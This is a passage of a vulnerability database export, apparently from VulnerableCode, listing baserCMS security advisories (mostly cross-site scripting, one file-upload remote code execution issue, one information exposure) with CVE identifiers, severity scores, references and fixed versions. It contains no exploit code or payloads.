vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46995, GHSA-mr7q-fv7j-jcgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr
29
url VCID-kmpp-6j49-pqfz
vulnerability_id VCID-kmpp-6j49-pqfz
summary 
baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability
There is a cross-site scripting vulnerability on the management system of baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.1 and earlier versions.

### Vulnerability
Execution of malicious JavaScript code may alter the display of the page or leak cookie information.
- In Favorite registration (CVE-2022-39325)
- In Permission Settings (CVE-2022-41994)
- In User group management (CVE-2022-42486)

### Countermeasures
Update to the latest version of baserCMS

### Credits
- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.
- YUYA KOTAKE@CARTA HOLDINGS, INC.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
reference_id
reference_type
scores
0
value 0.00687
scoring_system epss
scoring_elements 0.72163
published_at 2026-06-05T12:55:00Z
1
value 0.00687
scoring_system epss
scoring_elements 0.72122
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
7
reference_url https://github.com/advisories/GHSA-395x-wv32-44v5
reference_id GHSA-395x-wv32-44v5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-395x-wv32-44v5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-39325, GHSA-395x-wv32-44v5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz
30
url VCID-mfm9-gsh3-ubg8
vulnerability_id VCID-mfm9-gsh3-ubg8
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature
XSS vulnerability in Blog posts feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
reference_id
reference_type
scores
0
value 0.01236
scoring_system epss
scoring_elements 0.79576
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
reference_id CVE-2024-46996
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
4
reference_url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46996, GHSA-66jv-qrm3-vvfg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8
31
url VCID-nxrf-64er-xbfx
vulnerability_id VCID-nxrf-64er-xbfx
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
reference_id
reference_type
scores
0
value 0.02281
scoring_system epss
scoring_elements 0.85006
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
reference_id CVE-2024-26128
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
5
reference_url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2024-26128, GHSA-jjxq-m8h3-4vw5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx
32
url VCID-p695-t9ye-v3ga
vulnerability_id VCID-p695-t9ye-v3ga
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature
XSS vulnerability in Edit Email Form Settings Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
reference_id
reference_type
scores
0
value 0.01064
scoring_system epss
scoring_elements 0.7805
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_98693329
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://basercms.net/security/JVN_98693329
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
reference_id CVE-2024-46998
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
5
reference_url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46998, GHSA-p3m2-mj3j-j49x
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga
33
url VCID-p6nr-eu91-53b4
vulnerability_id VCID-p6nr-eu91-53b4
summary 
Cross-site Scripting
baserCMS is affected by Cross Site Scripting (XSS) and Remote Code Execution (RCE). This may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The affected components are `ThemeFilesController.php` and `UploaderFilesController.php`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15159
reference_id
reference_type
scores
0
value 0.01563
scoring_system epss
scoring_elements 0.8186
published_at 2026-06-05T12:55:00Z
1
value 0.01563
scoring_system epss
scoring_elements 0.81826
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15159
1
reference_url https://basercms.net/security/20200827
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/20200827
2
reference_url https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d
3
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15159
reference_id CVE-2020-15159
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15159
5
reference_url https://github.com/advisories/GHSA-673x-f5wx-fxpw
reference_id GHSA-673x-f5wx-fxpw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-673x-f5wx-fxpw
fixed_packages
0
url pkg:composer/baserproject/basercms@4.3.7
purl pkg:composer/baserproject/basercms@4.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-eq7f-n3g5-s3hu
11
vulnerability VCID-g56w-z9cx-5ygv
12
vulnerability VCID-ggv8-3v9t-mfea
13
vulnerability VCID-hpk4-a6tr-3ffe
14
vulnerability VCID-j37y-gws9-ake9
15
vulnerability VCID-jby7-s5ez-dqb3
16
vulnerability VCID-k575-suuf-7bhf
17
vulnerability VCID-k5qv-4yp3-zbgf
18
vulnerability VCID-khft-xvrw-g3dr
19
vulnerability VCID-kmpp-6j49-pqfz
20
vulnerability VCID-mfm9-gsh3-ubg8
21
vulnerability VCID-nxrf-64er-xbfx
22
vulnerability VCID-p695-t9ye-v3ga
23
vulnerability VCID-pd8c-9d7z-zkhg
24
vulnerability VCID-sqr4-v889-tff8
25
vulnerability VCID-twf5-bzba-gqb4
26
vulnerability VCID-u16w-rbuk-ybfs
27
vulnerability VCID-uedz-j2vn-cbea
28
vulnerability VCID-wvnk-63hy-ykeq
29
vulnerability VCID-xpsb-2yux-g3cf
30
vulnerability VCID-xxud-7jsh-bbc1
31
vulnerability VCID-y2sz-c6vb-pkdp
32
vulnerability VCID-zqd4-rdem-jfgk
33
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7
aliases CVE-2020-15159, GHSA-673x-f5wx-fxpw
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p6nr-eu91-53b4
34
url VCID-pd8c-9d7z-zkhg
vulnerability_id VCID-pd8c-9d7z-zkhg
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
reference_id
reference_type
scores
0
value 0.00572
scoring_system epss
scoring_elements 0.69062
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
1
reference_url https://basercms.net/security/JVN_24381990
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://basercms.net/security/JVN_24381990
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
5
reference_url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43647, GHSA-ggj4-78rm-6xgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg
35
url VCID-r4jc-22rq-d3cb
vulnerability_id VCID-r4jc-22rq-d3cb
summary 
Information Exposure
baserCMS allows remote attackers to bypass access restriction in mail form to view a file which is uploaded by a site user via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0575
reference_id
reference_type
scores
0
value 0.00169
scoring_system epss
scoring_elements 0.37823
published_at 2026-06-04T12:55:00Z
1
value 0.00169
scoring_system epss
scoring_elements 0.37914
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0575
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
